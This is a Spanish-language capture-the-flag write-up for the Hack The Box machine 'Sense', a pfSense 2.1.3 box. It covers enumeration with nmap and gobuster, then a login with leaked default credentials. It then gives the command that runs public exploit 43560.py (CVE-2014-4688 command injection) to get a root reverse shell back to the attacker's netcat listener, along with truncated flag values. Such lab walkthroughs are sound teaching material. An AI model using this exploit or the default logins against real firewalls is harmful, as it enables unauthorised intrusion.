Sense Writeup

FácilFreeBSD
Las flags que resuelven este reto se encuentran protegidas. Comparte el artículo en redes sociales para desbloquearlas.
$User Flag
8721327c...
#Root Flag
d08c32a5...

En este writeup vamos a ver cómo resolver la máquina Sense de la plataforma de Hack the Box.

Conexión

Conectar nuestra máquina de ataque a la VPN:

$ openvpn gorkamu-htb.ovpn

Capturar User Flag

Si ponemos la IP en el navegador web veremos la siguiente página:

login pfsense
login pfsense

Si pasamos nmap vemos que solo tiene dos puertos abiertos, 80 y 443:

nmap
nmap

Capturando la petición y lanzándola por Burpsuite vemos que existe una cookie llamada cookie_test y unos parámetros POST (usernameplf, passwordplf y login) pero no obtenemos nada interesante.

Hacemos un scan con gobuster o dirbuster para descubrir ficheros.

gobuster -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -s 200 -x php,txt,jpg,jpeg,gif

Encontramos los siguientes ficheros

dirbuster
dirbuster

Hay dos txt que son interesantes:

  • changelog.txt
  • system-users.txt

En changelog.txt podemos encontrar lo siguiente:

# Security Changelog ### Issue There was a failure in updating the firewall. Manual patching is therefore required ### Mitigated 2 of 3 vulnerabilities have been patched. ### Timeline The remaining patches will be installed during the next maintenance window

En system-users.txt lo siguiente:

####Support ticket### Please create the following user username: Rohit password: company defaults

Si en el login probamos las siguientes credenciales entraremos al panel:

  • user: rohit
  • password: pfsense

pfsense dashboard
pfsense dashboard

Si buscamos la versión de pfSense en google (pfSense 2.1.3) nos encontramos que existe una vulnerabilidad susceptible a escalada de privilegios:

https://vuldb.com/es/?id.70189

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4688

Si hacemos una búsqueda en searchsploit por pfSense veremos lo siguiente:

pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection | php/webapps/43560.py

Ese es el exploit que vamos a utilizar. Para ello nos dirigimos a /usr/share/exploitdb/exploits/php/webapps y lo invocamos de la siguiente forma:

python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.7 --lport 1234 --username rohit --password pfsense

En una terminal nueva con netcat recibiremos la conexión de la shell inversa y veremos que somos el usuario root.

Nos dirigimos a /home/rohit y ahí tendremos el fichero user.txt con la USER Flag.

Capturar Root Flag

Hacemos un cat de /root/root.txt y ya tendremos la ROOT Flag

https://resources.infosecinstitute.com/topic/hack-the-box-htb-walkthrough-sense/

También te puede interesar

Shocker Writeup

Shocker Writeup

Solidstate Writeup

Solidstate Writeup

Spectra Writeup

Spectra Writeup